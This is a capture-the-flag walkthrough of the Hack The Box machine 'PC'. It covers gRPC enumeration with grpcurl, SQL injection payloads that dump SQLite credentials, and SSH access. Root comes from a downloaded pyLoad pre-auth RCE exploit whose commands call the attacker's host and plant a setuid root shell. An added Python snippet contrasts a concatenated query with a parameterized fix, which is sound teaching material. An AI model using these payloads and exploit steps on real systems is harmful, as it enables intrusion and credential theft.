PC

Recon

nmap_scan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.102.185:22
Open 10.129.102.185:50051
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.102.185
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 17:25 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:25
Completed NSE at 17:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:25
Completed NSE at 17:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:25
Completed NSE at 17:25, 0.01s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:25
Completed Parallel DNS resolution of 1 host. at 17:25, 0.22s elapsed
DNS resolution of 1 IPs took 0.22s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 17:25
Scanning 10.129.102.185 [2 ports]
Discovered open port 50051/tcp on 10.129.102.185
Discovered open port 22/tcp on 10.129.102.185
Completed Connect Scan at 17:25, 0.09s elapsed (2 total ports)
Initiating Service scan at 17:26
Scanning 2 services on 10.129.102.185
Completed Service scan at 17:26, 6.34s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.102.185.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 5.18s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.01s elapsed
Nmap scan report for 10.129.102.185
Host is up, received user-set (0.087s latency).
Scanned at 2024-11-24 17:25:59 UTC for 12s

PORT      STATE SERVICE REASON  VERSION
22/tcp    open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
|   256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPqhx1OUw1d98irA5Ii8PbhDG3KVbt59Om5InU2cjGNLHATQoSJZtm9DvtKZ+NRXNuQY/rARHH3BnnkiCSyWWJc=
|   256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBG1KtV14ibJtSel8BP4JJntNT3hYMtFkmOgOVtyzX/R
50051/tcp open  grpc    syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:26
Completed NSE at 17:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.84 seconds

GRPC (50051)

Apart from SSH, the only open port on the box is 50051, the default port for gRPC servers.

grpcurl can be used to interact with the service.

└─$ grpcurl 10.129.102.185:50051 list
Failed to dial target host "10.129.102.185:50051": tls: first record does not look like a TLS handshake

└─$ grpcurl -plaintext 10.129.102.185:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection

┌──(woyag㉿kraken)-[~/Desktop/Rooms/PC]
└─$ grpcurl -plaintext 10.129.102.185:50051 list SimpleApp
SimpleApp.LoginUser
SimpleApp.RegisterUser
SimpleApp.getInfo

└─$ grpcurl -plaintext 10.129.102.185:50051 describe SimpleApp
SimpleApp is a service:
service SimpleApp {
  rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );
  rpc RegisterUser ( .RegisterUserRequest ) returns ( .RegisterUserResponse );
  rpc getInfo ( .getInfoRequest ) returns ( .getInfoResponse );
}

└─$ grpcurl -plaintext 10.129.102.185:50051 SimpleApp.getInfo
{
  "message": "Authorization Error.Missing 'token' header"
}

└─$ grpcurl -plaintext 10.129.102.185:50051 SimpleApp.RegisterUser
{
  "message": "username or password must be greater than 4"
}

└─$ grpcurl -plaintext -format text -d 'username: "test", password: "test"' 10.129.102.185:50051 SimpleApp.RegisterUser
message: "Account created for user test!"

└─$ grpcurl -plaintext -format text -d 'username: "test", password: "test"' 10.129.102.185:50051 SimpleApp.LoginUser
message: "Your id is 363."

└─$ grpcurl -plaintext -format text -H "token: 363" -d 'id: "363"' 10.129.102.185:50051 SimpleApp.getInfo
message: "Authorization Error.Missing 'token' header"

└─$ grpcurl -plaintext 10.129.102.185:50051 describe getInfoRequest
getInfoRequest is a message:
message getInfoRequest {
  string id = 1;
}

getInfoRequest is somewhat troublesome: the call demands a token header, but login only gives us an id...

Supplying the -v (verbose) flag gives more output, and there is the token, in the response trailers.

└─$ grpcurl -v -plaintext -format text -d 'username: "test", password: "test"' 10.129.102.185:50051 SimpleApp.LoginUser

Resolved method descriptor:
rpc LoginUser ( .LoginUserRequest ) returns ( .LoginUserResponse );

Request metadata to send:
(empty)

Response headers received:
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

Response contents:
message: "Your id is 788."

Response trailers received:
token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTczMjQ4MDE5MX0.jjvhshsuvPfw_izElK73Nk2oeoKk4EUM2OYyNFLsrrE'
Sent 1 request and received 1 response

└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTczMjQ4MDE5MX0.jjvhshsuvPfw_izElK73Nk2oeoKk4EUM2OYyNFLsrrE" -d 'id: "788"' 10.129.102.185:50051 SimpleApp.getInfo
message: "Will update soon."

The only output getInfo returns is message: "Will update soon.", which is not much to go on..

The token expires within a few minutes, so I automated the process; the final command is the part that changes on each run, so I left it as an echo.

#!/bin/bash
# Register an account, log in, pull the JWT out of the response trailers
# and print the ready-to-run getInfo command.

AUTH='username: "letmein", password: "letmein"'
TARGET=10.129.102.185:50051

# Create the account; the response is not needed.
grpcurl -plaintext -format text -d "$AUTH" "$TARGET" SimpleApp.RegisterUser >/dev/null

# -v is required: the token only appears in the "Response trailers received" section.
resp=$(grpcurl -v -plaintext -format text -d "$AUTH" "$TARGET" SimpleApp.LoginUser)
token=$(echo "$resp" | grep -oP "token: b'\K[^']+")
user_id=$(echo "$resp" | grep -oP 'message: "Your id is \K[0-9]+')

# The id must be a quoted string in the text-format request body.
echo "grpcurl -plaintext -format text -H \"token: $token\" -d \"id: \\\"$user_id\\\"\" $TARGET SimpleApp.getInfo"

SQL injection is possible in the id field.

└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibGV0bWVpbiIsImV4cCI6MTczMjQ4MzE2Mn0.1H4GsW4wtMBDcPOhJwrUK8vVtHluod2IHchLOvlHwAQ" -d "id: \"690 AND 1=1-- -\"" 10.129.102.185:50051 SimpleApp.getInfo
message: "Will update soon."

SQLite payload reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md#sqlite-string

└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibGV0bWVpbiIsImV4cCI6MTczMjQ4MzE2Mn0.1H4GsW4wtMBDcPOhJwrUK8vVtHluod2IHchLOvlHwAQ" -d "id: \"690 UNION SELECT GROUP_CONCAT(sql) FROM sqlite_master -- -\"" 10.129.102.185:50051 SimpleApp.getInfo
message: "CREATE TABLE \"accounts\" (\n\tusername TEXT UNIQUE,\n\tpassword TEXT\n),CREATE TABLE messages(id INT UNIQUE, username TEXT UNIQUE,message TEXT)"

└─$ grpcurl -plaintext -format text -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibGV0bWVpbiIsImV4cCI6MTczMjQ4MzE2Mn0.1H4GsW4wtMBDcPOhJwrUK8vVtHluod2IHchLOvlHwAQ" -d "id: \"690 UNION SELECT GROUP_CONCAT(username || ':' || password) FROM accounts -- -\"" 10.129.102.185:50051 SimpleApp.getInfo
message: "admin:admin,sau:HereIsYourPassWord1431"
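The root cause behind the dump above is the id from getInfoRequest being concatenated into a SQLite query. The following is an added example, not the box's /opt/app/app.py: it rebuilds the two tables the sqlite_master dump revealed in an in-memory database with constructed sample rows, shows a lookup written the vulnerable way next to a parameterized one, and runs the page's UNION payload against both.

```python
import sqlite3

# Constructed in-memory database using the schema from the sqlite_master dump
# (accounts and messages tables). Rows are sample values, not the box's data.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE "accounts" (username TEXT UNIQUE, password TEXT);
        CREATE TABLE messages(id INT UNIQUE, username TEXT UNIQUE, message TEXT);
        INSERT INTO accounts VALUES ('admin', 'SAMPLE_ADMIN_PW'), ('sau', 'SAMPLE_USER_PW');
        INSERT INTO messages VALUES (788, 'test', 'Will update soon.');
    """)
    return db

# The pattern that produces the page's finding: the id string is spliced into
# the SQL text, so "690 UNION SELECT ..." is executed as part of the query.
def get_info_vulnerable(db, user_id):
    row = db.execute(f"SELECT message FROM messages WHERE id = {user_id}").fetchone()
    return row[0] if row else None

# Hardened version: the id is bound as a parameter. SQLite compares the bound
# value against the INT column as data; text that is not a well-formed number
# simply never matches, and no part of it is parsed as SQL.
def get_info_fixed(db, user_id):
    row = db.execute("SELECT message FROM messages WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None

# The second payload from the writeup, unchanged.
PAYLOAD = "690 UNION SELECT GROUP_CONCAT(username || ':' || password) FROM accounts -- -"

if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal id :", get_info_vulnerable(db, "788"))
    print("vulnerable, payload   :", get_info_vulnerable(db, PAYLOAD))
    print("fixed, normal id      :", get_info_fixed(db, "788"))
    print("fixed, payload        :", get_info_fixed(db, PAYLOAD))
```

With the concatenated query the payload returns the whole accounts table through the message field; with the bound parameter the same input returns no row.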

SSH (22)

Creds: sau:HereIsYourPassWord1431

└─$ ssh sau@10.129.102.185
sau@pc:~$ id
uid=1001(sau) gid=1001(sau) groups=1001(sau)

User.txt

sau@pc:~$ cat user.txt
3f9955a40000644faa48435d39d1ce6a

Privilege Escalation

sau@pc:~$ ss -tunlp4
Netid                State                 Recv-Q                Send-Q                                Local Address:Port                                 Peer Address:Port                Process
udp                  UNCONN                0                     0                                     127.0.0.53%lo:53                                        0.0.0.0:*
udp                  UNCONN                0                     0                                           0.0.0.0:68                                        0.0.0.0:*
tcp                  LISTEN                0                     4096                                  127.0.0.53%lo:53                                        0.0.0.0:*
tcp                  LISTEN                0                     128                                         0.0.0.0:22                                        0.0.0.0:*
tcp                  LISTEN                0                     5                                         127.0.0.1:8000                                      0.0.0.0:*
tcp                  LISTEN                0                     128                                         0.0.0.0:9666                                      0.0.0.0:*
---
└─$ ssh sau@10.129.102.185 -L 8000:0:8000 -L 9666:0:9666

An internal application called pyLoad is running on port 8000 as root.

sau@pc:~$ ps aux | grep py
root         807  0.0  0.4  29876 18320 ?        Ss   17:24   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         998  0.0  0.7 634704 30612 ?        Ssl  17:24   0:02 /usr/bin/python3 /opt/app/app.py
root        1004  0.0  1.9 1251296 77564 ?       Ssl  17:24   0:04 /usr/bin/python3 /usr/local/bin/pyload
sau         2066  0.0  0.0   8160   724 pts/0    S+   18:47   0:00 grep --color=auto py

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

└─$ curl -LOs https://www.exploit-db.com/download/51532
└─$ py 51532.py -u http://localhost:8000 -c 'curl 10.10.14.42'

Exploit works.

└─$ py 51532.py -u http://localhost:8000 -c 'install -m4777 /bin/bash /tmp/rootbash'
[+] Check if target host is alive: http://localhost:8000
[+] Host up, let's exploit!
[+] The exploit has be executeded in target machine.
sau@pc:/opt/app$ /tmp/rootbash -p
rootbash-5.0# id
uid=1001(sau) gid=1001(sau) euid=0(root) groups=1001(sau)

Root.txt

rootbash-5.0# cd /root
rootbash-5.0# cat root.txt
624b00dedbaac39c36bbc1d1208c6f87
